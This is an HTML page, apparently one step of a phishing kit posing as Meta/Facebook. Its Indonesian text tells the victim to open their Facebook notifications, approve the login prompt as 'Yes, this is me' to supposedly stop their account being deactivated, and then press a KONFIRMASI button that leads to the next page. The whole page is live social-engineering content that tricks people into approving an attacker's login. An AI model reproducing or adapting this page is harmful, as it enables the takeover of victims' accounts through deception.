<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Home | Notif</title>
    <link rel="shortcut icon" type="image/x-icon" href="https://www.weebly.com/favicon.ico">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.7.2/css/all.min.css" integrity="sha512-Evv84Mr4kqVGRNSgIGL/F/aIDqQb7xQ2vcrdIwxfjThSH8CSR7PBEakCr51Ck+w+/U6swU2Im1vVX0SVk9ABhg==" crossorigin="anonymous" referrerpolicy="no-referrer" />
</head>
<body>
    <style>
        * {
            padding: 0;
            margin: 0;
        }
        header {
            background-color: white;
            justify-content: center;
            align-items: center;
            text-align: center;
        }
        .logo {
            margin: 0 10px;
        }
        .logo img{
            width: 100%;
            margin-top: 50px;
        }
        form {
            width: 100%;
        }
        form input {
            width: 85%;
            margin: 0px 10px;
            height: 40px;
            padding: 0 10px;
        }
        .Team {
            margin: 10px;
        }
        .Team p {
            font-weight: 200;
            font-family: system-ui, -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;
            font-size: 0.8rem;
        }
        .Team a {
            color: black;
            text-decoration: underline #a8a8a8;
        }
        .btn {
            margin-top: 15px;
        }
        .btn button {
            background-color: rgb(0, 110, 255);
            color: rgb(255, 255, 255);
            font-weight: 500;
            font-size: 1rem;
            padding:10px 15px;
            border: none;
        }
        .btn button:hover {
            background-color: rgb(0, 110, 255);
        }
        .centang {
            margin-top: 30px;
        }
        .centang img {
            margin-bottom: 20px;
            width: 70px;
        }
        .konfir {
            border: 1px solid;
            margin: 0 20px;
            padding: 10px;
        }
        .centang h1 {
            letter-spacing: 1px;
            font-size: 0.8rem;
            font-weight: 500;
        }
    </style>
    <header>
        <div class="logo">
            <img src="https://ed030df0ac8ea705430d.cdn6.editmysite.com/uploads/b/ed030df0ac8ea705430d11c08fd7af48b5373d12bdb5cb2dda02a48f5a2e9bcf/IMG-20240526-WA0000_1716989468.jpg?width=2400&optimize=medium" alt="">
        </div>
        <div class="centang">
            <img src="notif.png" alt="">
            <div class="konfir">
            <h1>BAIKLAH SILAHKAN DI CEK NOTIFIKASI FACEBOOK ANDA DAN ADA PILIHAN INFO LOGIN SILAHKAN DIKLIK DAN PILIH YA,INI SAYA AGAR DAPAT TERKONFIRMASI PEMBATALAN PENONAKTIFAN AKUN ANDA DAN APABILA SUDAH DI SETUJUI KLIK TOMBOL DIBAWAH KONFIRMASI<br>🙏
            </h1>
            <div class="btn">
                <button onclick="window.location.href = 'index4.html'">KONFIRMASI</button>
            </div>
        </div>
        </div>
            
        </form>
        <img src="https://upload.wikimedia.org/wikipedia/commons/a/ab/Meta-Logo.png" alt="" style="width: 100px; text-align: center; margin-bottom: 5px; margin-top: 50px;">

    </header>
</body>
</html>